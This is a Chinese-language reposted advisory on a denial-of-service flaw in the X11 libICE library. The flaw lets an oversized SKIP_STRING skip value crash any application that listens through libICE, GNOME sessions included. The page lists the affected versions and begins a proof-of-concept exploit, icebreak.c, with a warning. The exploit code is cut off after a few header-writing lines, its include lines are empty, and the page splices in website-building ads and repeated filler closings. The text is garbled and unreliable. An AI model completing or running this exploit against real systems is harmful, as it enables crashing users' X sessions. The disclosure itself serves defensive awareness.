对libICE 库拒绝服务攻击漏洞的深入解析

此文章主要讲述的是libICE 库拒绝服务攻击漏洞,如果你对libICE 库拒绝服务攻击漏洞有兴趣的话,你就可以对以下的文章点击观看了,以下就是具体内容的描述,希望在你今后的学习中会有所帮助。

鄂托克网站制作公司哪家好,找创新互联建站!从网页设计、网站建设、微信开发、APP开发、响应式网站等网站项目制作,到程序开发,运营维护。创新互联建站从2013年开始到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选创新互联建站

受影响系统:

GNOME Gnome 1.1

GNOME GNOME 1.0.x

Open Group X 11.0R6.x

Open Group X 11.0R6

Open Group X 11.0R5

XFree86 X11R6 4.0

XFree86 X11R6 3.3.6

- RedHat Linux 6.2 i386

XFree86 X11R6 3.3.5

- RedHat Linux 6.1 i386

XFree86 X11R6 3.3.4

XFree86 X11R6 3.3.3

不受影响系统:

GNOME Gnome 1.2

描述:

libICE是X11 window系统的一部分。由于在处理SKIP_STRING宏的时候存在一些问题,导致

任何使用libICE创建监听socket的应用程序都可以被远程攻击,使之停止服务。攻击者可以

给skip提供一个很大的值,使指针指向某些未初始化的内存区域,从而发生段访问错误。

GNOME中大量的使用了libICE,因此攻击者可能对正在运行GNOME的用户的X会话发动攻击。

<* 来源:Chris Evans *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* icebreak.c - Chris Evans */

#include

#include

#include

int

main(int argc, const char* argv[])

{

unsigned char c;

unsigned int i;

unsigned short s;

char blankbuf[1000];

memset(blankbuf, '\0', sizeof(blankbuf));

/* Assume fd 1 is stdout */

/* ICE connection header */

/* First, pick an endian-ness */

/* Byte 1: Major opcode. Must be 0 */

c = 0;

write(1, &c, 1);

/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */

以上的相关内容就是对libICE 库拒绝服务攻击漏洞的介绍,望你能有所收获。

上述的相关内容就是对libICE 库拒绝服务攻击漏洞的描述,希望会给你带来一些帮助在此方面。

【编辑推荐】

  1. HP Tru64 UNIX ypserv拒绝服务攻击漏洞
  2. Sun Solaris内核补丁拒绝服务攻击漏洞
  3. Kerio个人防火墙工具拒绝服务攻击漏洞
  4. Cisco IPS包处理拒绝服务攻击漏洞
  5. Linux Kernel SCTP拒绝服务攻击漏洞

文章题目:对libICE 库拒绝服务攻击漏洞的深入解析
标题路径:http://www.shufengxianlan.com/qtweb/news18/259468.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联